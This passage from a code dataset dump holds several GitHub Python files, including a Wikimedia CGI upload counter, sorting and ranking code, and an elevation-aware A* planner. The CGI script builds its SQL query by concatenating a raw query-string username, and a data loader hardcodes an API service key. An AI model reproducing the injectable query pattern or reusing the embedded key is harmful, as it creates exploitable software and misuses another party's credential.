cv2.imread(\"./testingImages/test2.jpeg\")\npredictImage(testImage2)\n","repo_name":"gsopu8065/mlcrunchProjects","sub_path":"face/eigen_face.py","file_name":"eigen_face.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"39179031433","text":"#!/usr/bin/env python3\n\nimport os\nimport cgi\nimport sys\nfrom wmflabs import db\nimport yaml\n\n#Print header\nprint('Content-type: text/html\\n')\n\n# Fetch params\nlabs = False\nif 'QUERY_STRING' in os.environ:\n\tQS = os.environ['QUERY_STRING']\n\tqs = cgi.parse_qs(QS)\n\ttry:\n\t\tusername = qs['user'][0].replace('_', ' ')\n\texcept:\n\t\tprint('nouser')\n\t\tsys.exit(0)\n\tif 'labs' in qs:\n\t\tlabs = True\n\t\timport pymysql\n\t\t# Load config\n\t\t__dir__ = os.path.dirname(__file__)\n\t\tconfig = yaml.safe_load(open(os.path.join(__dir__, 'config.yaml')))\n\t\tconn = pymysql.connect(db=qs['labs'][0],\n\t\t\thost=config['DB_HOST'],\n\t\t\tuser=config['DB_USER'],\n\t\t\tpassword=config['DB_PASS'],\n\t\t\tcharset=\"utf8\",\n\t\t)\n\telse:\n\t\ttry:\n\t\t\tconn = db.connect(qs['db'][0])\n\t\texcept:\n\t\t\tconn = db.connect('commonswiki')\nelse:\n\tprint('nouser')\n\tsys.exit(0)\n\n##### PROGRAM ####\n\ncur = conn.cursor()\nwith cur:\n\tsql = 'select count(*) from logging_userindex where log_type=\"upload\" and log_actor=(select actor_id from actor where actor_name=\"' + username + '\");'\n\tif labs:\n\t\tsql = sql.replace('_userindex', '')\n\tcur.execute(sql)\n\tdata = cur.fetchall()\n\nresult = data[0][0]\nprint(result)\n","repo_name":"commons-app/commonsmisc","sub_path":"uploadsbyuser.py","file_name":"uploadsbyuser.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"70"}
+{"seq_id":"70725021028","text":"from clrs import *\nimport random\nimport math\n\n# 8.3-4 p200\n\ndef gen():\n n = random.randint(100,1000)\n k = n ** 3\n return [random.randint(0, k - 1) for _ in xrange(n)], k\n\ndef radix_sort(a, k):\n def counting_sort(a, i_shift):\n get_v = lambda n: (n >> i_shift * r) & mask\n b = list(a)\n c = [0] * kr\n a, b = b, a\n for n in a:\n v = get_v(n)\n c[v] += 1\n for i in xrange(1, kr):\n c[i] += c[i - 1]\n for i in xrange(len(a) - 1, -1, -1):\n n = a[i]\n v = get_v(n)\n c[v] -= 1\n b[c[v]] = n\n n = len(a)\n r = int(math.log(n, 2))\n kr = 2 ** r\n mask = 1\n for _ in xrange(r - 1):\n mask = (mask << 1) | 1\n lgk = int(math.ceil(math.log(k, 2)))\n m = (lgk + r - 1) // r\n for i_shift in xrange(m):\n counting_sort(a, i_shift)\n return a\n\n@check\ndef _():\n a, k = gen()\n oa = list(a)\n ans = radix_sort(a, k)\n rans = sorted(oa)\n yield ans == rans\n","repo_name":"fans656-deprecated/clrs","sub_path":"20.1 radix sort n^3 - 1.py","file_name":"20.1 radix sort n^3 - 1.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"8498790569","text":"import torch\nimport numpy as np\nimport torch.nn as nn\nfrom torch.nn.init import xavier_normal_ as nr_init\nfrom config.activation import activation\n\n\n\nclass RankNet(nn.Module):\n def __init__(self, f_para_dict=None):\n super(RankNet, self).__init__()\n self.model = self.ini_ffnns(**f_para_dict)\n\n def ini_ffnns(self, input_dim=None, h_dim=None, out_dim=1, num_layers=None, hd_af=None, hn_af=None, tl_af=None, dropout_rate=None, apply_tl_af=None):\n head_AF, hidden_AF, tail_AF = activation(hd_af), activation(hn_af), activation(tl_af)\n\n ffnns = nn.Sequential()\n if 1 == num_layers:\n nr_h1 = nn.Linear(input_dim, out_dim) # Input layer\n nr_init(nr_h1.weight)\n ffnns.add_module('L_1', nr_h1)\n\n if apply_tl_af:\n ffnns.add_module('ACT_1', tail_AF)\n else:\n nr_h1 = nn.Linear(input_dim, h_dim)\n nr_init(nr_h1.weight)\n ffnns.add_module('L_1', nr_h1)\n ffnns.add_module('ACT_1', head_AF)\n\n if num_layers > 2: # Hidden layer\n for i in range(2, num_layers):\n h_dim_half = h_dim / 2\n ffnns.add_module('_'.join(['DR', str(i)]), nn.Dropout(dropout_rate))\n nr_hi = nn.Linear(h_dim, int(h_dim_half))\n nr_init(nr_hi.weight)\n ffnns.add_module('_'.join(['L', str(i)]), nr_hi)\n ffnns.add_module('_'.join(['ACT', str(i)]), hidden_AF)\n h_dim = int(h_dim_half)\n nr_hn = nn.Linear(int(h_dim_half), out_dim) #Output layer\n nr_init(nr_hn.weight)\n ffnns.add_module('_'.join(['L', str(num_layers)]), nr_hn)\n if apply_tl_af:\n ffnns.add_module('_'.join(['ACT', str(num_layers)]), tail_AF)\n\n return ffnns\n\n\n def forward(self, torch_batch_rankings, torch_batch_std_labels):\n\n # Make a pair from the model predictions\n batch_pred = self.model(torch_batch_rankings) # batch_pred = [40,1]\n batch_pred_dim = torch.squeeze(batch_pred, 1) # batch_pred_dim = [40]\n batch_pred_diffs = batch_pred - torch.unsqueeze(batch_pred_dim, 0) # batch_pred_diffs = [40, 40]\n\n # Make a pair from the relevance of the label\n batch_std = torch_batch_std_labels # batch_std = [40]\n batch_std_diffs = torch.unsqueeze(batch_std, 1) - torch.unsqueeze(batch_std, 0) # batch_std_diffs = [40, 40]\n\n # Align to -1 ~ 1\n batch_Sij = torch.clamp(batch_std_diffs, -1, 1)\n\n sigma = 1.0\n batch_loss_1st = 0.5 * sigma * batch_pred_diffs * (1.0 - batch_Sij)\n batch_loss_2nd = torch.log(torch.exp(-sigma * batch_pred_diffs) + 1.0)\n\n # Calculate loss outside diagonal\n diagona = 1 - torch.eye(batch_loss_1st.shape[0])\n batch_loss = (batch_loss_1st + batch_loss_2nd) * diagona\n combination = (batch_loss_1st.shape[0] * (batch_loss_1st.shape[0] - 1)) / 2\n\n batch_loss_triu = (torch.sum(batch_loss) / 2) / combination\n\n #print(batch_loss_triu)\n\n return batch_loss_triu\n\n def predict(self, x):\n return self.model(x)\n\n","repo_name":"ryo59/Learning_to_rank","sub_path":"model/RankNet/ranknet.py","file_name":"ranknet.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"15690597034","text":"from puzzle.heuristics import analyze\nfrom puzzle.problems import problem\nfrom puzzle.puzzlepedia import puzzle\nfrom spec.mamba import *\n\n\nclass TestProblem(problem.Problem):\n @staticmethod\n def score(lines):\n if len(lines) > 1:\n return 0\n return 0.9\n\n def _solve(self):\n return {'meta: '+ ''.join(self.lines): 1}\n\n\nclass WeakMatchProblem(problem.Problem):\n @staticmethod\n def score(lines):\n del lines\n return 0.1\n\n def _solve(self):\n return {'meta: weak match': 0.1}\n\n\nclass MetaProblem(problem.Problem):\n @staticmethod\n def score(lines):\n src = '\\n'.join(lines)\n if src.startswith('meta:'):\n return 1\n return 0\n\n def _solve(self):\n return {'final solution': 1}\n\n\ndef _get_multi_puzzle():\n return puzzle.Puzzle('multi-puzzle', textwrap.dedent(\"\"\"\n sample 1\n sample 2\n \"\"\"))\n\n\nwith description('Puzzle'):\n with before.all:\n analyze.reset() # https://github.com/nestorsalceda/mamba/issues/91\n analyze.register(TestProblem)\n analyze.register(WeakMatchProblem)\n analyze.register(MetaProblem)\n\n with after.all:\n analyze.reset()\n\n with it('instantiates from string'):\n expect(puzzle.Puzzle('empty', '')).not_to(be_none)\n\n with it('instantiates from list'):\n expect(puzzle.Puzzle('empty', [''])).not_to(be_none)\n\n with it('instantiates from Puzzle'):\n expect(puzzle.Puzzle('empty', puzzle.Puzzle('child', ''))).not_to(be_none)\n\n with it('rejects invalid input'):\n expect(lambda: puzzle.Puzzle('empty', None)).to(\n raise_error(NotImplementedError))\n\n with it('selects the best matching problem'):\n p = puzzle.Puzzle('sample', 'sample')\n expect(p.problems()[0]).to(be_a(TestProblem))\n expect(p.problems()[0].kind).to(equal('TestProblem'))\n\n with it('selects the best solutions'):\n p = puzzle.Puzzle('sample', 'sample')\n expect(p.solutions()).to(equal(['meta: sample']))\n\n with it('allows solution override'):\n p = puzzle.Puzzle('sample', 'sample')\n p.problem(0).solution = 'solution override'\n expect(p.solutions()).to(equal(['solution override']))\n\n with description('multiple problems'):\n with it('finds multiple solutions'):\n p = _get_multi_puzzle()\n expect(p.solutions()).to(equal(['meta: sample 1', 'meta: sample 2']))\n\n with it('creates a second stage from the first'):\n stage2 = _get_multi_puzzle().get_next_stage()\n expect(stage2).to(be_a(puzzle.Puzzle))\n\n with it('finds the solution to the second stage'):\n stage2 = _get_multi_puzzle().get_next_stage()\n expect(stage2.solutions()).to(equal(['final solution']))\n\n with description('async changes'):\n with it('notifies problem subscribers when solution changes'):\n p = puzzle.Puzzle('sample', 'sample')\n subs = mock.Mock()\n p.subscribe(subs)\n expect(subs.on_next.call_count).to(equal(0))\n p.problem(0).solution = 'solution override'\n expect(subs.on_next.call_count).to(equal(1))\n expect(subs.on_next.call_args).to(equal(mock.call(\n ('sample.0', p.problem(0))\n )))\n\n with description('regression tests'):\n with it('parses clues in order'):\n source = textwrap.dedent(\"\"\"\n Classic Billy Wilder movie (4 wds)\n It ended with the Siege of Yorktown (2 wds)\n It may warn you of suprising object sizes (3 wds)\n Like most solid objects, as opposed to linear (hyph.)\n One who studies the spread of diseases\n The point in the orbit of a planet at which its closest to the sun\n Something asked intended to provoke a specific response (2 wds)\n Sort of valuable, like some gemstones\n Thoughtful discussion, as before a bill\n \"\"\").strip()\n lines = 
source.split('\\n')\n p = puzzle.Puzzle('ex', source)\n expect(p.problems()).to(have_len(len(lines)))\n for problem, line in zip(p.problems(), lines):\n expect(problem.lines).to(equal([line]))\n","repo_name":"PhilHarnish/forge","sub_path":"spec/puzzle/puzzlepedia/puzzle_spec.py","file_name":"puzzle_spec.py","file_ext":"py","file_size_in_byte":3896,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"70"}
+{"seq_id":"18812920382","text":"# Word Ladder II\nimport sys\nfrom collections import deque, defaultdict\n\npaths = set()\ndef dfs(connections, distance, beginWord, cur, path=None, visited=None):\n if path is None: path = []\n if visited is None: visited = set()\n path.append(cur)\n visited.add(cur)\n if cur == beginWord: paths.add(tuple(reversed(path)))\n for i in range(len(cur)):\n pattern = cur[:i] + '-' + cur[i + 1:]\n for word in connections[pattern]:\n if word not in visited:\n if distance[word] == distance[cur] - 1: dfs(connections, distance, beginWord, word, path.copy(), visited.copy())\n\nclass Solution:\n def findLadders(self, beginWord, endWord, wordList):\n wordList.append(beginWord)\n connections = defaultdict(list)\n for word in wordList:\n for i in range(len(word)):\n pattern = word[:i] + '-' + word[i + 1:]\n connections[pattern].append(word)\n distance = defaultdict(lambda: sys.maxsize)\n visited = defaultdict(lambda: False)\n queue = deque()\n queue.appendleft(beginWord)\n distance[beginWord] = 0\n visited[beginWord] = True\n while queue:\n cur = queue.pop()\n for i in range(len(cur)):\n pattern = cur[:i] + '-' + cur[i + 1:]\n for word in connections[pattern]:\n if not visited[word]:\n queue.appendleft(word)\n visited[word] = True\n distance[word] = distance[cur] + 1\n global paths\n paths = set()\n dfs(connections, distance, beginWord, endWord)\n return list(paths)","repo_name":"aqts-aqts/Leetcode","sub_path":"126.py","file_name":"126.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"18632230393","text":"import os\nimport django\nimport requests\nimport csv\nimport math\nfrom datetime import datetime\n\nfrom xml.etree import ElementTree as ET\n\nos.environ[\"DJANGO_SETTINGS_MODULE\"] = 'elderlyhome.settings'\ndjango.setup()\n\nfrom homes.models import Sigungu, Sido, Home\n\nWHOLE_SEARCH_URL = 'http://apis.data.go.kr/B550928/searchLtcInsttService/getLtcInsttSeachList'\nWHOLE_SEARCH_API_KEY = '7VNKCOoEs9UMYSx%2B7ksl2Tccbio3kT4xLLVFQhqnCf7DEZdaJEYnRIg2kKECa1OkN7DIFqNCI5mGetBCED7CwQ%3D%3D'\n\nsigungus = Sigungu.objects.all()\n\nindex = 0\n\nfor sigungu in sigungus:\n sido = Sido.objects.get(sido_code=sigungu.sido_code.sido_code)\n\n url = WHOLE_SEARCH_URL + '?serviceKey=' + WHOLE_SEARCH_API_KEY + '&siDoCd=' + str(sigungu.sido_code.sido_code) + '&siGunGuCd=' + sigungu.sigungu_code\n # print(url)\n response = requests.get(url)\n root = ET.fromstring(response.text)\n totalCount = int(root.find('body').find('totalCount').text)\n ceilCount = math.ceil(totalCount / 10)\n for i in range(ceilCount):\n pageUrl = url + '&pageNo=' + str(i + 1) + '&numOfRows=10'\n pageResponse = requests.get(pageUrl)\n pageRoot = ET.fromstring(pageResponse.text)\n item_array = pageRoot.find('body').find('items')\n items = item_array.findall('item')\n for item in items:\n adminNm = item.find('adminNm').text\n adminPttnCd = item.find('adminPttnCd').text\n longTermAdminSym = item.find('longTermAdminSym').text\n\n if Home.objects.filter(lt_sym_code=longTermAdminSym).count() == 0:\n h = Home.objects.create(\n home_name=adminNm,\n sido_code=sido,\n sigungu_code=sigungu,\n pttn_code=adminPttnCd,\n lt_sym_code=longTermAdminSym,\n address='',\n geo_lat='',\n geo_lng='',\n max_capacity=0,\n current_person=0,\n created_date=datetime.now(),\n updated_date=datetime.now()\n )\n print(index, sigungu.sigungu_name, adminNm)\n index = index + 1\n else:\n print(index, 'pass')\n index = index + 1\n","repo_name":"parkindani/eh-django-docker","sub_path":"scripts/load-data-whole.py","file_name":"load-data-whole.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"5408219977","text":"class Solution:\n def isSameTree(self, p: Optional[TreeNode], q: Optional[TreeNode]) -> bool:\n def dfs(p=p, q=q):\n#if one value is null return false\n if(p and not q):\n return False\n elif(q and not p):\n return False\n#if both are null return true\n elif not (p and q):\n return True\n#values are equal call the function on left and right\n if(p.val==q.val):\n #return true if both left and right are equal\n return(dfs(p.left, q.left) and dfs(p.right, q.right))\n else:\n#if they aren't equal return false\n return False\n \n return(dfs())","repo_name":"MaoxinTang/Train_algorithm","sub_path":"CodingTrain/Same Tree.py","file_name":"Same Tree.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"74785413667","text":"'''\r\n A*, path planner solution\r\n\r\n\r\nGROUP 14 - HAUQUE, IVANOV, TAN\r\n'''\r\n\r\nfrom tkinter import *\r\nimport struct\r\nimport xml.etree.ElementTree as ET\r\nfrom queue import *\r\nimport math\r\nimport numpy as np\r\nfrom numpy import long\r\n\r\n# bounds of the window, in lat/long\r\n\r\n\r\nLEFTLON = -78.8623\r\nRIGHTLON = -78.832\r\nTOPLAT = 43.8983\r\nBOTLAT = 43.8881\r\nWIDTH = RIGHTLON - LEFTLON\r\nHEIGHT = TOPLAT - BOTLAT\r\n# ratio of one degree of longitude to one degree of latitude\r\nLONRATIO = math.cos(TOPLAT * 3.1415 / 180)\r\nWINWID = 800\r\nWINHGT = (int)((WINWID / LONRATIO) * HEIGHT / WIDTH)\r\nTOXPIX = WINWID / WIDTH\r\nTOYPIX = WINHGT / HEIGHT\r\n# width,height of elevation array\r\nEPIX = 3601\r\n# approximate number of meters per degree of latitude\r\nMPERLAT = 111000\r\nMPERLON = MPERLAT * LONRATIO\r\n\r\ndef node_dist(n1, n2):\r\n ''' Distance between nodes n1 and n2, considering the elevation difference (in meters) '''\r\n dx = (n2.pos[0] - n1.pos[0]) * MPERLON\r\n dy = (n2.pos[1] - n1.pos[1]) * MPERLAT\r\n plain_distance = math.sqrt(dx * dx + dy * dy)\r\n elev_diff = n1.elev - n2.elev\r\n return math.sqrt(elev_diff * elev_diff + plain_distance * plain_distance) # in meters\r\n\r\nclass Node():\r\n ''' Graph (map) node, not a search node! '''\r\n __slots__ = ('id', 'pos', 'ways', 'elev', 'waystr', 'wayset')\r\n\r\n def __init__(self, id, p, e=0):\r\n self.id = id\r\n self.pos = p\r\n self.ways = []\r\n self.elev = e\r\n self.waystr = None\r\n\r\n def __str__(self):\r\n if self.waystr is None:\r\n self.waystr = self.get_waystr()\r\n return str(self.pos) + \": \" + self.waystr\r\n\r\n def get_waystr(self):\r\n if self.waystr is None:\r\n self.waystr = \"\"\r\n self.wayset = set()\r\n for w in self.ways:\r\n self.wayset.add(w.way.name)\r\n for w in self.wayset:\r\n self.waystr += w + \" \"\r\n return self.waystr\r\n\r\n\r\nclass Edge():\r\n ''' Graph (map) edge. Includes cost computation.'''\r\n __slots__ = ('way', 'dest', 'cost')\r\n\r\n def __init__(self, w, src, d):\r\n self.way = w\r\n self.dest = d\r\n self.cost = node_dist(src, d)\r\n if d.elev > src.elev:\r\n self.cost += (d.elev - src.elev) * 2\r\n if self.way.type == 'steps':\r\n self.cost *= 1.5\r\n\r\n\r\nclass Way():\r\n ''' A way is an entire street, for drawing, not searching. 
'''\r\n __slots__ = ('name', 'type', 'nodes')\r\n\r\n # nodes here for ease of drawing only\r\n def __init__(self, n, t):\r\n self.name = n\r\n self.type = t\r\n self.nodes = []\r\n\r\nclass Planner():\r\n __slots__ = ('nodes', 'ways')\r\n\r\n def __init__(self, n, w):\r\n self.nodes = n\r\n self.ways = w\r\n\r\n def heur(self, node, gnode):\r\n '''\r\n We changed the heuristic function taking into account the elevation of each node.\r\n '''\r\n return node_dist(node, gnode)\r\n\r\n def plan(self, s, g):\r\n '''\r\n Standard A* search\r\n '''\r\n if(s!=g):\r\n parents = {}\r\n costs = {}\r\n q = PriorityQueue()\r\n q.put((self.heur(s, g), s))\r\n parents[s] = None\r\n costs[s] = 0\r\n while not q.empty():\r\n cf, cnode = q.get()\r\n if cnode == g:\r\n print(\"Path found, time will be\", costs[g] * 60 / 5000, \" minutes.\") # 5 km/hr known as the preferred walking distance.\r\n return self.make_path(parents, g)\r\n for edge in cnode.ways:\r\n newcost = costs[cnode] + edge.cost\r\n if edge.dest not in parents or newcost < costs[edge.dest]:\r\n parents[edge.dest] = (cnode, edge.way)\r\n costs[edge.dest] = newcost\r\n q.put((self.heur(edge.dest, g) + newcost, edge.dest))\r\n else:\r\n print('Start and goal nodes are the same! - Closing the window')\r\n sys.exit(0)\r\n\r\n\r\n def make_path(self, par, g):\r\n nodes = []\r\n ways = []\r\n curr = g #Current is equal to g. Arranca de atras para adelante.\r\n nodes.append(curr)\r\n while par[curr] is not None:\r\n prev, way = par[curr]\r\n ways.append(way.name)\r\n nodes.append(prev)\r\n curr = prev\r\n nodes.reverse() #Se dan vuelta los arreglos\r\n ways.reverse()\r\n return nodes, ways\r\n\r\nclass PlanWin(Frame):\r\n '''\r\n All the GUI pieces to draw the streets, allow places to be selected,\r\n and then draw the resulting path.\r\n '''\r\n\r\n __slots__ = ('whatis', 'nodes', 'ways', 'elevs', 'nodelab', 'elab', \\\r\n 'planner', 'lastnode', 'startnode', 'goalnode')\r\n\r\n def lat_lon_to_pix(self, latlon):\r\n x = (latlon[1] - LEFTLON) * (TOXPIX)\r\n y = (TOPLAT - latlon[0]) * (TOYPIX)\r\n return x, y\r\n\r\n def pix_to_elev(self, x, y):\r\n return self.lat_lon_to_elev(((TOPLAT - (y / TOYPIX)), ((x / TOXPIX) + LEFTLON)))\r\n\r\n def lat_lon_to_elev(self, latlon):\r\n # row is 0 for 44N, 3601 (EPIX) for 42N\r\n row = (int)((44 - latlon[0]) * EPIX)\r\n # col is 0 for 18 E, 3601 for 19 E\r\n col = (int)((latlon[1] + 79) * EPIX)\r\n return self.elevs[row][col]\r\n\r\n def maphover(self, event):\r\n self.elab.configure(text=str(self.pix_to_elev(event.x, event.y)))\r\n for (dx, dy) in [(0, 0), (-1, 0), (0, -1), (1, 0), (0, 1), (-1, -1), (-1, 1), (1, -1), (1, 1)]:\r\n ckpos = (event.x + dx, event.y + dy)\r\n if ckpos in self.whatis:\r\n self.lastnode = self.whatis[ckpos]\r\n lnpos = self.lat_lon_to_pix(self.nodes[self.lastnode].pos)\r\n self.canvas.coords('lastdot', (lnpos[0] - 2, lnpos[1] - 2, lnpos[0] + 2, lnpos[1] + 2))\r\n nstr = str(self.lastnode)\r\n nstr += \" - \"\r\n nstr += str(self.nodes[self.whatis[ckpos]].get_waystr())\r\n self.nodelab.configure(text=nstr)\r\n return\r\n\r\n def mapclick(self, event):\r\n ''' Canvas click handler:\r\n First click sets path start, second sets path goal\r\n '''\r\n print\r\n \"Clicked on \" + str(event.x) + \",\" + str(event.y) + \" last node \" + str(self.lastnode)\r\n if self.lastnode is None:\r\n return\r\n if self.startnode is None:\r\n self.startnode = self.nodes[self.lastnode]\r\n self.snpix = self.lat_lon_to_pix(self.startnode.pos)\r\n self.canvas.coords('startdot', (self.snpix[0] - 5, self.snpix[1] 
- 5, self.snpix[0] + 5, self.snpix[1] + 5))\r\n elif self.goalnode is None:\r\n self.goalnode = self.nodes[self.lastnode]\r\n self.snpix = self.lat_lon_to_pix(self.goalnode.pos)\r\n self.canvas.coords('goaldot', (self.snpix[0] - 5, self.snpix[1] - 5, self.snpix[0] + 5, self.snpix[1] + 5))\r\n\r\n def clear(self):\r\n ''' Clear button callback. '''\r\n self.lastnode = None\r\n self.goalnode = None\r\n self.startnode = None\r\n self.canvas.coords('startdot', (0, 0, 0, 0))\r\n self.canvas.coords('goaldot', (0, 0, 0, 0))\r\n self.canvas.coords('path', (0, 0, 0, 0))\r\n\r\n def plan_path(self):\r\n ''' Path button callback, plans and then draws path.'''\r\n print (\"Planning Began!\")\r\n if self.startnode is None or self.goalnode is None:\r\n print(\"Start or goal nodes haven't been defined yet\")\r\n return\r\n print(\"From\", self.startnode.id, \"to\", self.goalnode.id)\r\n nodes, ways = self.planner.plan(self.startnode, self.goalnode)\r\n lastway = \"\"\r\n for wayname in ways:\r\n if wayname != lastway:\r\n print (wayname)\r\n lastway = wayname\r\n coords = []\r\n for node in nodes:\r\n npos = self.lat_lon_to_pix(node.pos)\r\n coords.append(npos[0])\r\n coords.append(npos[1])\r\n print(\"Coords: \\n\", coords)\r\n # print node.id\r\n self.canvas.coords('path', *coords)\r\n\r\n def __init__(self, master, nodes, ways, coastnodes, elevs):\r\n self.whatis = {}\r\n self.nodes = nodes\r\n self.ways = ways\r\n self.elevs = elevs\r\n self.startnode = None\r\n self.goalnode = None\r\n self.planner = Planner(nodes, ways)\r\n thewin = Frame(master)\r\n w = Canvas(thewin, width=WINWID, height=WINHGT) # , cursor=\"crosshair\")\r\n w.bind(\"\", self.mapclick)\r\n w.bind(\"\", self.maphover)\r\n for waynum in self.ways:\r\n nlist = self.ways[waynum].nodes\r\n thispix = self.lat_lon_to_pix(self.nodes[nlist[0]].pos)\r\n if len(self.nodes[nlist[0]].ways) > 2:\r\n self.whatis[((int)(thispix[0]), (int)(thispix[1]))] = nlist[0]\r\n for n in range(len(nlist) - 1):\r\n nextpix = self.lat_lon_to_pix(self.nodes[nlist[n + 1]].pos)\r\n self.whatis[((int)(nextpix[0]), (int)(nextpix[1]))] = nlist[n + 1]\r\n w.create_line(thispix[0], thispix[1], nextpix[0], nextpix[1])\r\n thispix = nextpix\r\n #thispix = self.lat_lon_to_pix(self.nodes[coastnodes[0]].pos)\r\n ## also draw the coast:\r\n #for n in range(len(coastnodes) - 1):\r\n # nextpix = self.lat_lon_to_pix(self.nodes[coastnodes[n + 1]].pos)\r\n # w.create_line(thispix[0], thispix[1], nextpix[0], nextpix[1], fill=\"blue\")\r\n # thispix = nextpix\r\n\r\n # other visible things are hiding for now...\r\n w.create_line(0, 0, 0, 0, fill='orange', width=3, tag='path')\r\n\r\n w.create_oval(0, 0, 0, 0, outline='green', fill='green', tag='startdot')\r\n w.create_oval(0, 0, 0, 0, outline='red', fill='red', tag='goaldot')\r\n w.create_oval(0, 0, 0, 0, outline='blue', fill='blue', tag='lastdot')\r\n w.pack(fill=BOTH)\r\n self.canvas = w\r\n\r\n cb = Button(thewin, text=\"Clear\", command=self.clear)\r\n cb.pack(side=RIGHT, pady=5)\r\n\r\n sb = Button(thewin, text=\"Plan!\", command=self.plan_path)\r\n sb.pack(side=RIGHT, pady=5)\r\n\r\n nodelablab = Label(thewin, text=\"Node:\")\r\n nodelablab.pack(side=LEFT, padx=5)\r\n\r\n self.nodelab = Label(thewin, text=\"None\")\r\n self.nodelab.pack(side=LEFT, padx=5)\r\n\r\n elablab = Label(thewin, text=\"Elev:\")\r\n elablab.pack(side=LEFT, padx=5)\r\n\r\n self.elab = Label(thewin, text=\"0\")\r\n self.elab.pack(side=LEFT, padx=5)\r\n\r\n thewin.pack()\r\n\r\ndef build_graph(elevs):\r\n ''' Build the search graph from the 
OpenStreetMap XML. '''\r\n tree = ET.parse('South Oshawa Map.osm')\r\n root = tree.getroot()\r\n\r\n nodes = dict()\r\n ways = dict()\r\n waytypes = set()\r\n coastnodes = []\r\n for item in root:\r\n if item.tag == 'node':\r\n coords = ((float)(item.get('lat')), (float)(item.get('lon')))\r\n # row is 0 for 44N\r\n erow = (int)((44 - coords[0]) * EPIX)\r\n # col is 0 for 79 W\r\n ecol = (int)((coords[1] + 79) * EPIX)\r\n try:\r\n el = elevs[erow][ecol]\r\n except IndexError:\r\n el = 0\r\n nodes[(long)(item.get('id'))] = Node((long)(item.get('id')), coords, el)\r\n elif item.tag == 'way':\r\n useme = False\r\n oneway = False\r\n myname = 'unnamed way'\r\n for thing in item:\r\n if thing.tag == 'tag' and thing.get('k') == 'highway':\r\n useme = True\r\n mytype = thing.get('v')\r\n if thing.tag == 'tag' and thing.get('k') == 'name':\r\n myname = thing.get('v')\r\n if thing.tag == 'tag' and thing.get('k') == 'oneway':\r\n if thing.get('v') == 'yes':\r\n oneway = True\r\n if useme:\r\n wayid = (long)(item.get('id'))\r\n ways[wayid] = Way(myname, mytype)\r\n nlist = []\r\n for thing in item:\r\n if thing.tag == 'nd':\r\n nlist.append((long)(thing.get('ref')))\r\n thisn = nlist[0]\r\n for n in range(len(nlist) - 1):\r\n nextn = nlist[n + 1]\r\n nodes[thisn].ways.append(Edge(ways[wayid], nodes[thisn], nodes[nextn]))\r\n thisn = nextn\r\n if not oneway:\r\n thisn = nlist[-1]\r\n for n in range(len(nlist) - 2, -1, -1):\r\n nextn = nlist[n]\r\n nodes[thisn].ways.append(Edge(ways[wayid], nodes[thisn], nodes[nextn]))\r\n thisn = nextn\r\n ways[wayid].nodes = nlist\r\n return nodes, ways, coastnodes\r\n\r\ndef build_elevs(): #Code adapted from asuggested code in the internet - Reference: https://bit.ly/2E1rIYs\r\n height = EPIX\r\n width = EPIX\r\n fi = open(r\"n43_w079_1arc_v2.bil\", \"rb\")\r\n contents = fi.read()\r\n fi.close()\r\n s = \"<%dH\" % (int(width * height),)\r\n z = struct.unpack(s, contents)\r\n heights = np.zeros((height, width))\r\n for r in range(0, height):\r\n for c in range(0, width):\r\n elevation = z[((width) * r) + c]\r\n heights[r][c] = float(elevation)\r\n print(len(heights))\r\n return heights\r\n\r\nelevs = build_elevs()\r\nnodes, ways, coastnodes = build_graph(elevs)\r\nprint(elevs)\r\n\r\nmaster = Tk()\r\nthewin = PlanWin(master, nodes, ways, coastnodes, elevs)\r\nmainloop()","repo_name":"FedeHauque/AI-Assignment1","sub_path":"AI-As1-Res.py","file_name":"AI-As1-Res.py","file_ext":"py","file_size_in_byte":13524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"19937151997","text":"import enum\r\nimport re\r\nimport sys\r\nimport itertools\r\nimport time\r\nfrom io import StringIO, TextIOWrapper\r\nfrom threading import Thread\r\nfrom typing import Optional, Self, Callable\r\n\r\n\r\nclass SysioProxy(StringIO):\r\n pass\r\n\r\n\r\nclass LoaderStyle(enum.Enum):\r\n SPINNER = \"spinner\"\r\n INDETERMINATE_BAR = \"indeterminate_bar\"\r\n\r\n\r\nclass Loader:\r\n __styles: dict[LoaderStyle, any] = {\r\n LoaderStyle.SPINNER: itertools.cycle(['/', '-', '+', '\\\\', '|']),\r\n LoaderStyle.INDETERMINATE_BAR: itertools.cycle([\r\n '|---------|',\r\n '|>--------|',\r\n '|->-------|',\r\n '|-->------|',\r\n '|--->-----|',\r\n '|---->----|',\r\n '|----->---|',\r\n '|------>--|',\r\n '|------->-|',\r\n '|-------->|',\r\n '|---------|',\r\n '|--------<|',\r\n '|-------<-|',\r\n '|------<--|',\r\n '|-----<---|',\r\n '|----<----|',\r\n '|---<-----|',\r\n '|--<------|',\r\n '|-<-------|',\r\n '|<--------|',\r\n ])\r\n }\r\n\r\n def get_message(self) -> Optional[str]:\r\n return self._message\r\n\r\n def set_message(self, message: Optional[str]) -> None:\r\n self._message = message\r\n self.__render_frame()\r\n\r\n def get_style(self) -> LoaderStyle:\r\n return self._style\r\n\r\n def set_style(self, style: LoaderStyle):\r\n self._style = style\r\n self.__render_frame()\r\n\r\n def set_style_and_message(self, style: LoaderStyle, message: Optional[str]):\r\n self._style = self.__styles[style]\r\n self._message = message\r\n self.__render_frame()\r\n\r\n message = property(get_message, set_message)\r\n style = property(get_style, set_style)\r\n\r\n def __init__(self,\r\n style: LoaderStyle = LoaderStyle.SPINNER,\r\n message: Optional[str] = None,\r\n refresh_interval_ms=50,\r\n show_timer: bool = True):\r\n if style not in self.__styles:\r\n raise KeyError(f\"{style} is not a valid Loader style. 
